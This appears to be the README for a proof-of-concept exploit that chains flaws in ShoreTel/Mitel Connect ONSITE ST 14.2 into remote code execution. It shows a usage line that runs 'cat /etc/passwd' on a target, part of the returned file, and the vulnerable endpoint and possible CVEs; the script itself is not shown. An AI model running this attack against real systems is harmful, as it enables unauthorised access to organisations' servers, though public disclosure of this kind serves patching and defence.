There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2 which, when chained together, result in remote code execution.
Not sure this is really needed but I’ll include it anyway.
# ./shoretel_rce.rb https://domain.com/ "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
<-- SNIP -->
I had access to a single device during the development of this PoC. As such, your system paths may be different and you may need to edit this script to fit your needs.
I am just adding this section to assist other people who are looking for an exploit.
- ShoreTel Version 19.49.5200.0 GA27 GA28
- CVE-2018-5782 (maybe)
- CVE-2017-16251 (maybe)
- ShoreTel Connect ONSITE ST 14.2 Remote Code Execution
- scripts/vsethost.php